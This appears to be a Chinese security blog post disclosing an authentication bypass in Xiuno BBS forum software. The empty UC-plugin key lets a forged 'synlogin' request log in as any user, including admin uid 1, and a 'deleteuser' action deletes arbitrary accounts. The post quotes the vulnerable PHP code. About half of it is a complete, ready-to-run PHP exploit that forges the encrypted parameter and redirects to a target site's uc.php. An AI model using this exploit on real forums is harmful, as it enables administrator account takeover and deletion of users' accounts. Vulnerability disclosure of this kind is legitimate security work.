- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
在乌云上提交了这厂商的一个漏洞(http://www.wooyun.org/bugs/wooyun-2010-019717),被华丽的无视了,以后挖到它的漏洞直接公开
0×0 漏洞概述
0×1 代码解析
0×2 PoC
0×0 漏洞概述
- xiuno实现了使用uc接口完成uc center登录的插件
- xiuno默认没有启用uc插件
- 在不启用时,uc插件的key:uc_appkey为空,因此在不启用uc插件的时候,uc插件自带的加解密函数可以利用这个特性被绕过
- uc用key解密传递进来的参数,其中解密后的action若等于synlogin,uid有效的话,将会使用该uid登录xiuno论坛的前台
0×1 代码解析
此版本为2.0
$code = core::gpc('code' );
//将传入的code参数用key解密然后放入get数组中
parse_str(uc_authcode ($code, 'DECODE' , $ucconf['uc_appkey']), $get);
$action = $get['action'];
//若action为synlogin,则用get数组中uid作为当前用户登录
elseif($action == 'synlogin' ) {
$uid = intval($get[ 'uid']);
$muser = new user();
$userdb = $muser->read($uid);
$muser->set_login_cookie($userdb);
exit(API_RETURN_SUCCEED);
}
//同时此处还有一个任意用户删除漏洞
elseif($action == 'deleteuser' ) {
$uids = $get[ 'ids'];
$uids = str_replace( "'", '' , $uids);
$arr = explode( ',', $uids);
$muser = new user();
foreach($arr as $uid) {
$uid = intval($uid);
$muser->xdelete($uid);
}
exit(API_RETURN_SUCCEED);
}
POC:
<?php /* * Xiuno bbs RC2 前台授权绕过漏洞exp * Author: ztz@Dis9Team * Mail: [email protected] * Blog: ztz.fuzzexp.org * 使用说明: * $_GET['target']: 目标的域名 * $_GET['ip']: 目标的ip * * 如: * http://yoursite.com/xiuno.php?target=www.xiuno.com&ip=114.113.224.156 * 然后手动访问主页即可 */ function uc_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } function send($request, $ip) { $result = ''; $meta = parse_url($request); $path = isset($meta['path']) ? $meta['path'] : exit('path error'); $host = isset($meta['host']) ? $meta['host'] : exit('host error'); $query = isset($meta['query']) ? $meta['query'] : exit('query error'); $packet = "GET $path?$query HTTP/1.1\r\n"; $packet .= "User-Agent: Mozilla/5.0\r\n"; $packet .= "Host: ".$ip."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $fp = fsockopen($ip, 80); fputs($fp, $packet); while(!feof($fp)) { $result .= fgets($fp,4096); } if(strpos($result, 'Set-Cookie') > 0) { $begin = strpos($result, 'Set-Cookie:'); $end = strpos($result, ";", $begin); $cookie = substr($result, $begin + 11, $end - $begin - 11); return $cookie; } } $target = $_GET['target']; $ip = $_GET['ip']; $time = time(); $str = "time=$time&action=synlogin&uid=1"; $en_str = uc_authcode($str, 'ENCODE', ''); $request = "http://$target/plugin/ucenter/api/uc.php?code=".urlencode($en_str); header("Location: $request", true, 302); ?>
原文:http://ztz.fuzzexp.org/?p=6
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
